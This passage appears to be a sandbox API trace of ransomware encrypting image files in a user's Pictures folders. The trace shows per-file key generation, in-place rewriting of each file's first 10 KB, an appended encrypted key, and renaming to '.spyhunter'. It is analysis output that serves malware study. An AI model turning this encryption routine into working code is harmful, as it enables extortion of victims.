hHeap=0x2c0000) returned 1 [0147.776] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270edc0 | out: pbBuffer=0x270edc0) returned 1 [0147.776] GetProcessHeap () returned 0x2c0000 [0147.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0147.776] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270edb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270edb8*=0x30) returned 1 [0147.776] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\j5EpxrEctZELHVi\\f-nnX0kWUczsWln7B.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\ao-ywnyofhy76t\\j5epxrectzelhvi\\f-nnx0kwuczswln7b.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.777] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\j5EpxrEctZELHVi\\f-nnX0kWUczsWln7B.png") returned 120 [0147.777] StrStrW (lpFirst="f-nnX0kWUczsWln7B.png", lpSrch=".txt") returned 0x0 [0147.777] GetProcessHeap () returned 0x2c0000 [0147.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.777] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ed7c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ed7c*=0x2800, lpOverlapped=0x0) returned 1 [0147.778] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.778] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ed7c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ed7c*=0x2800, lpOverlapped=0x0) returned 1 [0147.778] GetProcessHeap () returned 0x2c0000 [0147.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.778] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.778] WriteFile (in: hFile=0xa0, lpBuffer=0x270edbc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ed7c, lpOverlapped=0x0 | out: lpBuffer=0x270edbc*, lpNumberOfBytesWritten=0x270ed7c*=0x4, lpOverlapped=0x0) returned 1 [0147.778] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ed7c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ed7c*=0x30, lpOverlapped=0x0) returned 1 [0147.778] CloseHandle (hObject=0xa0) returned 1 [0147.778] GetProcessHeap () returned 0x2c0000 [0147.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0147.778] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\j5EpxrEctZELHVi\\f-nnX0kWUczsWln7B.png.spyhunter") returned 130 [0147.778] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\j5EpxrEctZELHVi\\f-nnX0kWUczsWln7B.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\ao-ywnyofhy76t\\j5epxrectzelhvi\\f-nnx0kwuczswln7b.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\j5EpxrEctZELHVi\\f-nnX0kWUczsWln7B.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\ao-ywnyofhy76t\\j5epxrectzelhvi\\f-nnx0kwuczswln7b.png.spyhunter")) returned 1 [0147.779] GetProcessHeap () returned 0x2c0000 [0147.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0147.779] GetProcessHeap () returned 0x2c0000 [0147.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0147.779] GetProcessHeap () returned 0x2c0000 [0147.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbf7e0 | out: hHeap=0x2c0000) returned 1 [0147.779] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270edb8 | out: pbBuffer=0x270edb8) returned 1 [0147.779] GetProcessHeap () returned 0x2c0000 [0147.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0147.779] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270edb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270edb0*=0x30) returned 1 [0147.779] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\j5EpxrEctZELHVi\\DxP5k1m-A.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\ao-ywnyofhy76t\\j5epxrectzelhvi\\dxp5k1m-a.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.780] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\j5EpxrEctZELHVi\\DxP5k1m-A.bmp") returned 112 [0147.780] StrStrW (lpFirst="DxP5k1m-A.bmp", lpSrch=".txt") returned 0x0 [0147.780] GetProcessHeap () returned 0x2c0000 [0147.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.780] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ed74, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ed74*=0x2800, lpOverlapped=0x0) returned 1 [0147.781] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.781] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ed74, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ed74*=0x2800, lpOverlapped=0x0) returned 1 [0147.781] GetProcessHeap () returned 0x2c0000 [0147.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.781] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.781] WriteFile (in: hFile=0xa0, lpBuffer=0x270edb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ed74, lpOverlapped=0x0 | out: lpBuffer=0x270edb4*, lpNumberOfBytesWritten=0x270ed74*=0x4, lpOverlapped=0x0) returned 1 [0147.781] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ed74, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ed74*=0x30, lpOverlapped=0x0) returned 1 [0147.781] CloseHandle (hObject=0xa0) returned 1 [0147.781] GetProcessHeap () returned 0x2c0000 [0147.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0147.781] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\j5EpxrEctZELHVi\\DxP5k1m-A.bmp.spyhunter") returned 122 [0147.781] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\j5EpxrEctZELHVi\\DxP5k1m-A.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\ao-ywnyofhy76t\\j5epxrectzelhvi\\dxp5k1m-a.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\j5EpxrEctZELHVi\\DxP5k1m-A.bmp.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\ao-ywnyofhy76t\\j5epxrectzelhvi\\dxp5k1m-a.bmp.spyhunter")) returned 1 [0147.782] GetProcessHeap () returned 0x2c0000 [0147.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0147.782] GetProcessHeap () returned 0x2c0000 [0147.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0147.782] GetProcessHeap () returned 0x2c0000 [0147.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe8ec0 | out: hHeap=0x2c0000) returned 1 [0147.782] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270edb8 | out: pbBuffer=0x270edb8) returned 1 [0147.782] GetProcessHeap () returned 0x2c0000 [0147.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0147.782] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270edb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270edb0*=0x30) returned 1 [0147.782] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\j5EpxrEctZELHVi\\0mMdRcGXScQcwN.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\ao-ywnyofhy76t\\j5epxrectzelhvi\\0mmdrcgxscqcwn.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.783] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\j5EpxrEctZELHVi\\0mMdRcGXScQcwN.bmp") returned 117 [0147.783] StrStrW (lpFirst="0mMdRcGXScQcwN.bmp", lpSrch=".txt") returned 0x0 [0147.783] GetProcessHeap () returned 0x2c0000 [0147.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.783] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ed74, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ed74*=0x2800, lpOverlapped=0x0) returned 1 [0147.783] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.784] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ed74, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ed74*=0x2800, lpOverlapped=0x0) returned 1 [0147.784] GetProcessHeap () returned 0x2c0000 [0147.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.784] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.784] WriteFile (in: hFile=0xa0, lpBuffer=0x270edb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ed74, lpOverlapped=0x0 | out: lpBuffer=0x270edb4*, lpNumberOfBytesWritten=0x270ed74*=0x4, lpOverlapped=0x0) returned 1 [0147.784] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ed74, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ed74*=0x30, lpOverlapped=0x0) returned 1 [0147.784] CloseHandle (hObject=0xa0) returned 1 [0147.784] GetProcessHeap () returned 0x2c0000 [0147.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0147.784] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\j5EpxrEctZELHVi\\0mMdRcGXScQcwN.bmp.spyhunter") returned 127 [0147.784] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\j5EpxrEctZELHVi\\0mMdRcGXScQcwN.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\ao-ywnyofhy76t\\j5epxrectzelhvi\\0mmdrcgxscqcwn.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\j5EpxrEctZELHVi\\0mMdRcGXScQcwN.bmp.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\ao-ywnyofhy76t\\j5epxrectzelhvi\\0mmdrcgxscqcwn.bmp.spyhunter")) returned 1 [0147.785] GetProcessHeap () returned 0x2c0000 [0147.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0147.785] GetProcessHeap () returned 0x2c0000 [0147.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0147.785] GetProcessHeap () returned 0x2c0000 [0147.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe8d88 | out: hHeap=0x2c0000) returned 1 [0147.785] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270edb0 | out: pbBuffer=0x270edb0) returned 1 [0147.785] GetProcessHeap () returned 0x2c0000 [0147.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0147.785] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270eda8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270eda8*=0x30) returned 1 [0147.785] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\j5EpxrEctZELHVi\\-MaD3QCgKurw1m8 rM.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\ao-ywnyofhy76t\\j5epxrectzelhvi\\-mad3qcgkurw1m8 rm.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.786] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\j5EpxrEctZELHVi\\-MaD3QCgKurw1m8 rM.png") returned 121 [0147.786] StrStrW (lpFirst="-MaD3QCgKurw1m8 rM.png", lpSrch=".txt") returned 0x0 [0147.786] GetProcessHeap () returned 0x2c0000 [0147.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.786] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ed6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ed6c*=0x2800, lpOverlapped=0x0) returned 1 [0147.787] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.787] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ed6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ed6c*=0x2800, lpOverlapped=0x0) returned 1 [0147.787] GetProcessHeap () returned 0x2c0000 [0147.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.787] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.787] WriteFile (in: hFile=0xa0, lpBuffer=0x270edac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ed6c, lpOverlapped=0x0 | out: lpBuffer=0x270edac*, lpNumberOfBytesWritten=0x270ed6c*=0x4, lpOverlapped=0x0) returned 1 [0147.787] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ed6c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ed6c*=0x30, lpOverlapped=0x0) returned 1 [0147.787] CloseHandle (hObject=0xa0) returned 1 [0147.787] GetProcessHeap () returned 0x2c0000 [0147.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0147.788] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\j5EpxrEctZELHVi\\-MaD3QCgKurw1m8 rM.png.spyhunter") returned 131 [0147.788] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\j5EpxrEctZELHVi\\-MaD3QCgKurw1m8 rM.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\ao-ywnyofhy76t\\j5epxrectzelhvi\\-mad3qcgkurw1m8 rm.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\j5EpxrEctZELHVi\\-MaD3QCgKurw1m8 rM.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\ao-ywnyofhy76t\\j5epxrectzelhvi\\-mad3qcgkurw1m8 rm.png.spyhunter")) returned 1 [0147.788] GetProcessHeap () returned 0x2c0000 [0147.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0147.788] GetProcessHeap () returned 0x2c0000 [0147.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0147.788] GetProcessHeap () returned 0x2c0000 [0147.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbf2c0 | out: hHeap=0x2c0000) returned 1 [0147.789] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270edb0 | out: pbBuffer=0x270edb0) returned 1 [0147.789] GetProcessHeap () returned 0x2c0000 [0147.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0147.789] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270eda8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270eda8*=0x30) returned 1 [0147.789] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\8R1lgh.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\ao-ywnyofhy76t\\8r1lgh.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.789] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\8R1lgh.jpg") returned 93 [0147.789] StrStrW (lpFirst="8R1lgh.jpg", lpSrch=".txt") returned 0x0 [0147.789] GetProcessHeap () returned 0x2c0000 [0147.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.789] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ed6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ed6c*=0x2800, lpOverlapped=0x0) returned 1 [0147.790] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.790] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ed6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ed6c*=0x2800, lpOverlapped=0x0) returned 1 [0147.790] GetProcessHeap () returned 0x2c0000 [0147.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.790] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.790] WriteFile (in: hFile=0xa0, lpBuffer=0x270edac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ed6c, lpOverlapped=0x0 | out: lpBuffer=0x270edac*, lpNumberOfBytesWritten=0x270ed6c*=0x4, lpOverlapped=0x0) returned 1 [0147.790] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ed6c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ed6c*=0x30, lpOverlapped=0x0) returned 1 [0147.791] CloseHandle (hObject=0xa0) returned 1 [0147.791] GetProcessHeap () returned 0x2c0000 [0147.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0147.791] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\8R1lgh.jpg.spyhunter") returned 103 [0147.791] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\8R1lgh.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\ao-ywnyofhy76t\\8r1lgh.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\8R1lgh.jpg.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\ao-ywnyofhy76t\\8r1lgh.jpg.spyhunter")) returned 1 [0147.791] GetProcessHeap () returned 0x2c0000 [0147.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0147.792] GetProcessHeap () returned 0x2c0000 [0147.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0147.792] GetProcessHeap () returned 0x2c0000 [0147.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f61a38 | out: hHeap=0x2c0000) returned 1 [0147.792] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eda8 | out: pbBuffer=0x270eda8) returned 1 [0147.792] GetProcessHeap () returned 0x2c0000 [0147.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0147.792] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270eda0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270eda0*=0x30) returned 1 [0147.792] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\-Zqdb rryz2S.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\ao-ywnyofhy76t\\-zqdb rryz2s.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.792] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\-Zqdb rryz2S.bmp") returned 99 [0147.792] StrStrW (lpFirst="-Zqdb rryz2S.bmp", lpSrch=".txt") returned 0x0 [0147.792] GetProcessHeap () returned 0x2c0000 [0147.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.792] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ed64, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ed64*=0x2800, lpOverlapped=0x0) returned 1 [0147.793] 